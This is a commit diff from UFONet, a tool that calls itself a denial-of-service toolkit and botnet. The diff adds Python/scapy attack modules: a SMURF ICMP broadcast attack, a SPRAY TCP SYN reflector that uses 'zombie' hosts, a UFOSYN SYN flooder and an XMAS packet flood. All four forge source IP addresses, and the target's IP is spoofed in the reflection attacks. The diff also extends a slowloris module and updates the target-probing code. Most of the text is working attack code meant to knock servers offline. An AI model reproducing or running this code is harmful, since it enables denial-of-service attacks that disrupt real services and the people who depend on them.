         self.methods = ['GET', 'POST', 'X-METHOD'] # supported HTTP requests methods
 
     def attacking(self, target, requests):
-        print "\n[Info] Slow HTTP requests (LORIS) is ready to fire: [" , requests, "tractor beams ]\n"
+        print "\n[Info] [AI] Slow HTTP requests (LORIS) is ready to fire: [" , requests, "tractor beams ]\n"
         try:
             ip = socket.gethostbyname(target)
         except:
-            ip = target
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
         tractor(self, ip, requests) # attack with LORIS using threading

+ 111 - 0
core/mods/smurf.py

@@ -0,0 +1,111 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, random, socket, urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet ICMP broadcast attack (SMURF)
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x
+
+def sIP(base_stations): # extract 'base stations'
+    bs = {}
+    s_zombie = random.choice(base_stations).strip() # suffle 'base stations'
+    if not s_zombie in bs:
+        try:
+            s_zombie_ip = socket.gethostbyname(s_zombie)
+            bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(s_zombie)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    s_zombie_ip = str(rd)
+                bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
+            except:
+                s_zombie_ip = s_zombie
+    else:
+        s_zombie_ip = bs.get(s_zombie)
+    return s_zombie_ip
+
+def smurfize(ip, sport, rounds):
+    f = open('botnet/zombies.txt') # use 'zombies' as 'base stations'
+    base_stations = f.readlines()
+    base_stations = [ base_station.replace('\n','') for base_station in base_stations ]
+    f.close()
+    n=0
+    try:
+        for x in range (0,int(rounds)):
+            n=n+1
+            s_zombie_ip = sIP(base_stations)
+            if s_zombie_ip == None: # not any 'base stations' available
+                print "[Error] [AI] [SMURF] Imposible to retrieve 'base stations' -> [Aborting!]\n"
+                break
+            seq = randInt()
+            window = randInt()
+            IP_p = IP()
+            try:
+                IP_p.src = ip # ICMP 'broadcast' package carring fraudulent (spoofed) source IP belonging to target (aka SMURF attack)
+            except:
+                print "[Error] [AI] [SMURF] Imposible to resolve IP from target! -> [Aborting!]\n"
+                break
+            try:
+                IP_p.dst = s_zombie_ip
+            except:
+                print "[Error] [AI] [SMURF] Imposible to resolve IP from 'base station' -> [Aborting!]\n"
+                break
+            TCP_l = TCP()
+            TCP_l.sport = sport
+            TCP_l.dport = sport
+            TCP_l.seq = seq
+            TCP_l.window = window
+            try:
+                send(IP_p/ICMP(), verbose=0)
+                print "[Info] [AI] [SMURF] Redirecting 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"] -> [RE-FLUXING!]"
+                time.sleep(1) # sleep time required for balanced sucess
+            except:
+                print "[Error] [AI] [SMURF] Failed to redirect 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"]"
+    except:
+        print("[Error] [AI] [SMURF] Failing to engage... -> Is still target online? -> [Checking!]")
+
+class SMURF(object):
+    def attacking(self, target, rounds):
+        print "[Info] [AI] ICMP Broadcast (SMURF) is redirecting: [" , rounds, "base stations ]\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+            sport = 80
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+            sport = 443
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [SMURF] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        smurfize(ip, sport, rounds) # attack with SMURF using threading

+ 116 - 0
core/mods/spray.py

@@ -0,0 +1,116 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, random, socket, urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet TCP SYN Reflector (SPRAY)
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x
+
+def sIP(base_stations): # extract 'base stations'
+    bs = {}
+    s_zombie = random.choice(base_stations).strip() # suffle 'base stations'
+    if not s_zombie in bs:
+        try:
+            s_zombie_ip = socket.gethostbyname(s_zombie)
+            bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(s_zombie)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    s_zombie_ip = str(rd)
+                bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
+            except:
+                s_zombie_ip = s_zombie
+    else:
+        s_zombie_ip = bs.get(s_zombie)
+    return s_zombie_ip
+
+def sprayize(ip, sport, rounds):
+    f = open('botnet/zombies.txt') # use 'zombies' as 'base stations'
+    base_stations = f.readlines()
+    base_stations = [ base_station.replace('\n','') for base_station in base_stations ]
+    f.close()
+    n=0
+    try:
+        for x in range (0,int(rounds)):
+            n=n+1
+            s_zombie_ip = sIP(base_stations)
+            if s_zombie_ip == None: # not any 'base stations' available
+                print "[Error] [AI] [SPRAY] Imposible to retrieve 'base stations' -> [Aborting!]\n"
+                break
+            seq = randInt()
+            window = randInt()
+            IP_p = IP()
+            try:
+                IP_p.src = ip # SYN packets carring fraudulent (spoofed) source IP belonging to target (aka DrDoS)
+            except:
+                print "[Error] [AI] [SPRAY] Imposible to resolve IP from 'target' -> [Aborting!]\n"
+                break
+            try:
+                IP_p.dst = s_zombie_ip
+            except:
+                print "[Error] [AI] [SPRAY] Imposible to resolve IP from 'base station' -> [Aborting!]\n"
+                break
+            TCP_l = TCP()
+            TCP_l.sport = sport
+            TCP_l.dport = sport
+            TCP_l.seq = seq
+            TCP_l.window = window
+            TCP_l.flags = "S" # SYN
+            SYNACK=(IP_p/TCP_l)
+            TCP_l.flags = "A" # ACK
+            TCP_l.seq = SYNACK.ack+1
+            TCP_l.ack = SYNACK.seq+1
+            try:
+                send(IP_p/TCP_l, verbose=0)
+                print "[Info] [AI] [SPRAY] Redirecting 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"] -> [RE-FLUXING!]"
+                time.sleep(1) # sleep time required for balanced sucess
+            except:
+                print "[Error] [AI] [SPRAY] Failed to redirect 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"]"
+    except:
+        print("[Error] [AI] [SPRAY] Failing to engage... -> Is still target online? -> [Checking!]")
+
+class SPRAY(object):
+    def attacking(self, target, rounds):
+        print "[Info] [AI] TCP SYN Reflector (SPRAY) is redirecting: [" , rounds, "base stations ]\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+            sport = 80
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+            sport = 443
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [SPRAY] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        sprayize(ip, sport, rounds) # attack with SPRAY using threading

+ 82 - 0
core/mods/ufosyn.py

@@ -0,0 +1,82 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, random, socket, time, urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet TCP SYN Flooder (UFOSYN)
+def randIP():
+    ip = ".".join(map(str, (random.randint(0,255)for _ in range(4))))
+    return ip
+
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x	
+
+def synize(ip, port, rounds):
+    n=0
+    try:
+        for x in range (0,int(rounds)):
+            n=n+1
+            sport = randInt()
+            seq = randInt()
+            window = randInt()
+            IP_p = IP()
+            IP_p.src = randIP()
+            try:
+                IP_p.dst = ip
+            except:
+                print "[Error] [AI] [UFOSYN] Imposible to resolve IP from target -> [Aborting!]\n"
+                break
+            TCP_l = TCP()	
+            TCP_l.sport = sport
+            TCP_l.dport = port
+            TCP_l.flags = "S" # SYN
+            TCP_l.seq = seq
+	    TCP_l.window = window
+            try:
+                send(IP_p/TCP_l, verbose=0)
+                print "[Info] [AI] [UFOSYN] Firing 'quantum hook' ["+str(n)+"] -> [FLOODING!]"
+                time.sleep(1) # sleep time required for balanced sucess
+            except:
+                print "[Error] [AI] [UFOSYN] Failed to engage with 'quantum hook' ["+str(n)+"]"
+    except:
+        print("[Error] [AI] [UFOSYN] Failing to engage... -> Is still target online? -> [Checking!]")
+
+class UFOSYN(object):
+    def attacking(self, target, rounds):
+        print "[Info] [AI] TCP SYN Flooder (UFOSYN) is ready to fire: [" , rounds, "quantum hooks ]\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+            port = 80
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+            port = 443
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [UFOSYN] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        synize(ip, port, rounds) # attack with UFOSYN using threading

+ 82 - 0
core/mods/xmas.py

@@ -0,0 +1,82 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, random, socket, urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet TCP 'Christmas Tree' packet attack (XMAS)
+def randIP():
+    ip = ".".join(map(str, (random.randint(0,255)for _ in range(4))))
+    return ip
+
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x
+
+def xmasize(ip, sport, rounds):
+    n=0
+    try:
+        for x in range (0,int(rounds)):
+            n=n+1
+            s_zombie_port = randInt() 
+            seq = randInt()
+            window = randInt()
+            IP_p = IP()
+            IP_p.src = randIP()
+            try:
+                IP_p.dst = ip
+            except:
+                print "[Error] [AI] [XMAS] Imposible to resolve IP from 'target' -> [Aborting!]\n"
+                break
+            TCP_l = TCP()
+            TCP_l.sport = s_zombie_port
+            TCP_l.dport = sport
+            TCP_l.seq = seq
+            TCP_l.window = window
+            TCP_l.flags = "UFP" # ALL FLAGS SET (like a XMAS tree)
+            try:
+                send(IP_p/TCP_l, verbose=0)
+                print "[Info] [AI] [XMAS] Firing 'ionized quartz' ["+str(n)+"] -> [IONIZING!]"
+                time.sleep(1) # sleep time required for balanced sucess
+            except:
+                print "[Error] [AI] [XMAS] Failed to engage with 'ionized quartz' ["+str(n)+"]"
+    except:
+        print("[Error] [AI] [XMAS] Failing to engage... -> Is still target online? -> [Checking!]")
+
+class XMAS(object):
+    def attacking(self, target, rounds):
+        print "[Info] [AI] TCP 'Christmas Tree' (XMAS) is ready to fire: [" , rounds, "ionized quartzs ]\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+            sport = 80
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+            sport = 443
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [XMAS] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        xmasize(ip, sport, rounds) # attack with XMAS using threading

File diff suppressed because it is too large
+ 42 - 30
core/options.py


+ 9 - 0
core/tools/__init__.py

@@ -0,0 +1,9 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - DDoS Botnet via Web Abuse - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 21 - 9
core/abductor.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2017 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2017/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -37,7 +37,7 @@ class Abductor(object):
             if self.ufonet.options.proxy: # set proxy
                 self.proxy_transport(self.ufonet.options.proxy)
                 self.start = time.time()
-                target_reply = urllib2.urlopen(req).read()
+                target_reply = urllib2.urlopen(req, context=self.ctx).read()
                 header = urllib2.urlopen(req).info()
                 self.stop = time.time()
             else:
@@ -46,8 +46,8 @@ class Abductor(object):
                 header = urllib2.urlopen(req).info()
                 self.stop = time.time()
         except: 
-            print('[Error] - Unable to connect...\n')
-            return #sys.exit(2)
+            print('[Error] [AI] Unable to connect -> [Exiting!]\n')
+            return
         return target_reply, header
 
     def convert_size(self, size):
@@ -100,7 +100,7 @@ class Abductor(object):
             req = urllib2.Request(target, None, headers)
             if self.ufonet.options.proxy: # set proxy
                 self.proxy_transport(self.ufonet.options.proxy)
-                target_reply = urllib2.urlopen(req).read()
+                target_reply = urllib2.urlopen(req, context=self.ctx).read()
             else:
                 target_reply = urllib2.urlopen(req, context=self.ctx).read()
         except: 
@@ -139,10 +139,10 @@ class Abductor(object):
         try:
             target_reply, header = self.establish_connection(target)
         except:
-            print "[Error] - Something wrong connecting to your target. Aborting...\n"
+            print "[Error] [AI] Something wrong connecting to your target -> [Aborting!]\n"
             return #sys.exit(2)
         if not target_reply:
-            print "[Error] - Something wrong connecting to your target. Aborting...\n"
+            print "[Error] [AI] Something wrong connecting to your target -> [Aborting!]\n"
             return #sys.exit(2)
         print ' -Target URL:', target, "\n"
         try:
@@ -162,7 +162,19 @@ class Abductor(object):
         try:       
             ipv4 = socket.gethostbyname(domain)
         except:
-            ipv4 = "OFF"
+            try:
+                try: # extra resolver plan extracted from Orb (https://orb.03c8.net/) [24/12/2018 -> OK!]
+                    import dns.resolver
+                    r = dns.resolver.Resolver()
+                    r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                    url = urlparse(domain)
+                    a = r.query(url.netloc, "A") # A record
+                    for rd in a:
+                        ipv4 = str(rd)
+                except:
+                    ipv4 = "OFF"
+            except:
+                ipv4 = "OFF"
         try:
             ipv6 = socket.getaddrinfo(domain, port, socket.AF_INET6)
             ftpca = ipv6[0]
@@ -223,4 +235,4 @@ class Abductor(object):
                 print '\n---------'
             except:
                 pass
-        print "\n[Info] Abduction finished... ;-)\n"
+        print "\n[Info] [AI] Abduction finished! -> [OK!]\n"

+ 66 - 66
core/inspector.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - Denial of Service Toolkit - 2013/2014/2015/2016/2017/2018 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -57,13 +57,13 @@ class Inspector(object):
             if self.ufonet.options.proxy: # set proxy
                 self.proxy_transport(self.ufonet.options.proxy)
                 req = urllib2.Request(target, None, headers)
-                target_reply = urllib2.urlopen(req).read()
+                target_reply = urllib2.urlopen(req, context=self.ctx).read()
             else:
                 req = urllib2.Request(target, None, headers)
                 target_reply = urllib2.urlopen(req, context=self.ctx).read()
         except: 
-            print('[Error] - Unable to connect to target\n')
-            return #sys.exit(2)
+            print('[Error] [AI] Unable to connect to target -> [Exiting!]\n')
+            return
         try: # search for image files
             regex_img = []
             regex_img1 = "<img src='(.+?)'" # search on target's results using regex with simple quotation
@@ -87,7 +87,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            img_file = urllib2.urlopen(req).read()
+                            img_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             img_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -99,13 +99,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + img, None, headers)
-                            img_file = urllib2.urlopen(req).read()
+                            img_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + img, None, headers)
                             img_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(img_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Image')
+                    print('[Error] [AI] Unable to retrieve info from Image -> [Discarding!]')
                     size = 0
                 imgs[img] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -134,7 +134,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mov_file = urllib2.urlopen(req).read()
+                            mov_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mov_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -146,13 +146,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mov, None, headers)
-                            mov_file = urllib2.urlopen(req).read()
+                            mov_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mov, None, headers)
                             mov_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mov_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 movs[mov] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -181,7 +181,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            webm_file = urllib2.urlopen(req).read()
+                            webm_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             webm_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -193,13 +193,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + webm, None, headers)
-                            webm_file = urllib2.urlopen(req).read()
+                            webm_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + webm, None, headers)
                             webm_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(webm_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 webms[webm] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -228,7 +228,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            avi_file = urllib2.urlopen(req).read()
+                            avi_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             avi_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -240,13 +240,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + avi, None, headers)
-                            avi_file = urllib2.urlopen(req).read()
+                            avi_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + avi, None, headers)
                             avi_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(avi_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 avis[avi] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -275,7 +275,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            swf_file = urllib2.urlopen(req).read()
+                            swf_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             swf_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -287,13 +287,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + swf, None, headers)
-                            swf_file = urllib2.urlopen(req).read()
+                            swf_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + swf, None, headers)
                             swf_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(swf_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Flash')
+                    print('[Error] [AI] Unable to retrieve info from Flash -> [Discarding!]')
                     size = 0
                 swfs[swf] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -322,7 +322,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mpg_file = urllib2.urlopen(req).read()
+                            mpg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mpg_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -334,13 +334,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mpg, None, headers)
-                            mpg_file = urllib2.urlopen(req).read()
+                            mpg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mpg, None, headers)
                             mpg_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mpg_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 mpgs[mpg] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -369,7 +369,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mpeg_file = urllib2.urlopen(req).read()
+                            mpeg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mpeg_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -381,13 +381,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mpeg, None, headers)
-                            mpeg_file = urllib2.urlopen(req).read()
+                            mpeg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mpeg, None, headers)
                             mpeg_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mpeg_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 mpegs[mpeg] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -416,7 +416,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mp3_file = urllib2.urlopen(req).read()
+                            mp3_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mp3_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -428,13 +428,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mp3, None, headers)
-                            mp3_file = urllib2.urlopen(req).read()
+                            mp3_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mp3, None, headers)
                             mp3_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mp3_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Audio')
+                    print('[Error] [AI] Unable to retrieve info from Audio -> [Discarding!]')
                     size = 0
                 mp3s[mp3] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -463,7 +463,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mp4_file = urllib2.urlopen(req).read()
+                            mp4_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mp4_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -475,13 +475,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mp4, None, headers)
-                            mp4_file = urllib2.urlopen(req).read()
+                            mp4_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mp4, None, headers)
                             mp4_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mp4_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 mp4s[mp4] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -510,7 +510,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            ogg_file = urllib2.urlopen(req).read()
+                            ogg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             ogg_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -522,13 +522,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + ogg, None, headers)
-                            ogg_file = urllib2.urlopen(req).read()
+                            ogg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + ogg, None, headers)
                             ogg_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(ogg_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Audio')
+                    print('[Error] [AI] Unable to retrieve info from Audio -> [Discarding!]')
                     size = 0
                 oggs[ogg] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -557,7 +557,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            ogv_file = urllib2.urlopen(req).read()
+                            ogv_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             ogv_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -569,13 +569,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
